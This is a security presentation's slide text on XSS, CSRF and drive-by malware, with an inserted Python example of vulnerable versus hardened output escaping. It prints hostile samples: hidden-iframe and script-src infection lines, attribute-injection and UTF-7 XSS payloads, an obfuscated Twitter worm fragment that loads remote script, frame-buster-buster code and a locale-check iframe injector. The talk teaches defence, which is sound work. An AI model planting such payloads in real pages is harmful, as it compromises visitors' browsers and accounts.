When HTML Goes Bad


Inside XSS, CSRF, and Malware...

Mike Shema
Security Research Engineer, Qualys Inc.

When HTML Goes Bad

XSS (HTML injection)
CSRF (HTTP actuation)
Malware (game over...)

Money

Attacks refocus from web server to web browser via the web application
Compromise the web application in order to use it as a delivery mechanism
Infect rather than deface
Automated SQL injection attacks infected tens of thousands of web sites

Us and Them

...exploit the system to gain admin access
Requires shell code
Install keylogger, network sniffer, botnet
Search for documents, credentials,

...exploit the browser
No shell code required
Access financial information
Access e-mail
Access social network

Poles Apart

Desktop
Access controls
Process separation
Anti-virus

Browser
Same Origin Policy
Blocks pop-ups
Blocks third-party cookies
Tabs!
Database (HTML5)

Safe Links?

http://bit.ly/2z3MBj
http://bit.ly/z18Rv
http://bit.ly/OApJX
http://bit.ly/lSxst
http://bit.ly/wszWO
http://bit.ly/A6Ca
http://tinyurl.com/6q2ab9

Infection

<script src=http://_.cn>

<iframe src="http://_.info/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no>

Behind the Scenes

http://website/page.cgi?user=Machine
<html><body> Welcome to the Machine ...

http://website/page.cgi?user=<script>...
<html><body> Welcome to the <script>... ...

Behind the Scenes

http://website/page.cgi?redirect=http://website/otherpage.html
<html><body> Welcome to the Machine <a href=http://website/otherpage.html>link</a> ...

http://website/page.cgi?redirect=+onclick=alert(echoes);a=
<html><body> Welcome to the Machine <a href= onclick=alert(echoes);a=>link</a> ...
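The two page.cgi exchanges above (a text-node injection via user= and an unquoted-attribute injection via redirect=), modelled in Python as an added example that is not part of the slides. It assumes the application's own host is "website" and stands in for page.cgi with a string template; the helper names are constructed for the illustration.

```python
# Added illustration, not code from the slides: a minimal model of the
# page.cgi responses shown above, vulnerable and hardened side by side.
# Page/parameter names come from the slides; helper names are constructed.
from html import escape
from urllib.parse import urlsplit

# Output as the slides show it: text-node context plus an UNQUOTED href.
VULN_TEMPLATE = "<html><body> Welcome to the {user} <a href={redirect}>link</a> ..."
# Hardened template: the attribute value is quoted, so whitespace inside the
# value can no longer start a new attribute.
SAFE_TEMPLATE = '<html><body> Welcome to the {user} <a href="{redirect}">link</a> ...'
ALLOWED_HOST = "website"  # the application's own host (assumed from the slides)


def render_vulnerable(user: str, redirect: str) -> str:
    """Echo both parameters verbatim, as the slides' page.cgi does."""
    return VULN_TEMPLATE.format(user=user, redirect=redirect)


def render_escape_only(user: str, redirect: str) -> str:
    """Escaping alone fixes the text-node case but not the unquoted attribute:
    ' onclick=alert(echoes);a=' contains none of < > & " ' and survives intact."""
    return VULN_TEMPLATE.format(user=escape(user, quote=True),
                                redirect=escape(redirect, quote=True))


def safe_redirect(url: str) -> str:
    """Reject rather than rectify: only same-host http(s) URLs pass; anything
    else (javascript:, protocol-relative, attribute fragments) is replaced."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or parts.hostname != ALLOWED_HOST:
        return f"http://{ALLOWED_HOST}/"
    return url


def render_hardened(user: str, redirect: str) -> str:
    """Context-aware output: escape text-node data, validate then escape the
    quoted attribute value."""
    return SAFE_TEMPLATE.format(user=escape(user, quote=True),
                                redirect=escape(safe_redirect(redirect), quote=True))


if __name__ == "__main__":
    # The slides' second payload: the '+' in the query string decodes to a space.
    attr_payload = " onclick=alert(echoes);a="
    print(render_vulnerable("<script>...", "http://website/otherpage.html"))
    print(render_vulnerable("Machine", attr_payload))
    print(render_escape_only("Machine", attr_payload))   # still injected
    print(render_hardened("<script>...", attr_payload))  # neutralised
```

The escape-only variant is the "rectify" approach from the later slides: it is context-blind, so the attribute context still breaks; quoting plus an allow-list on the URL is the "reject" approach.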

So You Think You Can Tell...

+ADw-script+AD4/lorem ipsem/.source

Careful With That AJAX, Eugene


var _0xc26a = ["Msxml2.XMLHTTP", "Microsoft.XMLHTTP", "connect", "toUpperCase", "GET", "?", "open", "", "Method", "POST ", " HTTP/1.1", "setRequestHeader", "Content-Type", "application/x-www-form-urlencoded", "onreadystatechange", "readyState", "send", "split", "join", "'", "%27", "(", "%28", ")", "%29", "*", "%2A", "~", "%7E", "!", "%21", "%20", "+", "%", "replace", "innerHTML", "documentElement", "exec", "Twitter should really fix this... Mikeyy", "I am done... Mikeyy", "Mikeyy is done..", "Twitter please fix this, regards Mikeyy", "random", "length", "floor", "mikeyy:) "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20 %73%72%63%3d%22%68%74%74%70%3a%2f%2f%63%6f%6e%74%65%6e %74%2e%69%72%65%65%6c%2e%63%6f%6d%2f%6a%73%78%73%73%2 e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "mikeyy:) "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20 %73%72%63%3d%22%68%74%74%70%3a%2f%2f%63%6f%6e%74%65%6e %74%2e%69%72%65%65%6c%2e%63%6f%6d%2f%78%73%73%6a%73%2 e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "mikeyy:) "></a><script>


XSS

Character encoding
Valid, but unexpected
Invalid, but rendered

Payload encoding
JavaScript obfuscation
Browser-specific quirk

Unusual Suspects

Flash
PDF
Images
Browser quirks

Where Are the Worms?

MySpace (old, so very, very old)
Twitter
No large web app worm has been truly weaponized

CSRF

Taking advantage of the design of HTML & HTTP
Forcing state onto a non-stateful transport
Forced workflows

Frame Busting

if (top != self) {
  top.location.replace(self.location.href);
}

<script type="text/javascript">
var prevent_bust = 0;
window.onbeforeunload = function() { prevent_bust++ };
setInterval(function() {
  if (prevent_bust > 0) {
    prevent_bust -= 2;
    window.top.location = 'http://server-which-responds-with204.com';
  }
}, 1);
</script>

http://www.codinghorror.com/blog/archives/001277.html
http://stackoverflow.com/questions/958997/frame-buster-buster-buster-code-needed

Malware

Drive-by download
Safe browsing lists
Blacklisted domains
Anti-detection mechanisms

// Locale check as an anti-detection measure: the injected frame is only
// written when the browser's system language is not zh-cn.
if (navigator.systemLanguage == 'zh-cn') {
} else {
  document.writeln("<iframe src=http://_.com/img/info.htm width=0 height=0></iframe>");
}

Bricks in the Wall

Coding practices
Frameworks
Libraries

Black list vs. white list
Rectify vs. reject
Inoculation

Another Brick in the Wall

User base
xssed, ha.ckers.org

Web application scanners
Source code scanners

Browser Evolution

Move more countermeasures into the browser
Process isolation
Anti-XSS
Anti-CSRF
Behavioral anti-virus

A New Machine

HTML5
Cross-document messaging a.k.a. Some Other Origins, Too
Database

Expanding the attack surface
Increasing the information store

Thank You!
During Live Presentation Please Use Your WebEx Q&A Panel to Submit Questions

To Request a 14-day Free Trial of our Web Application Scanning Solution, email: was-info@qualys.com
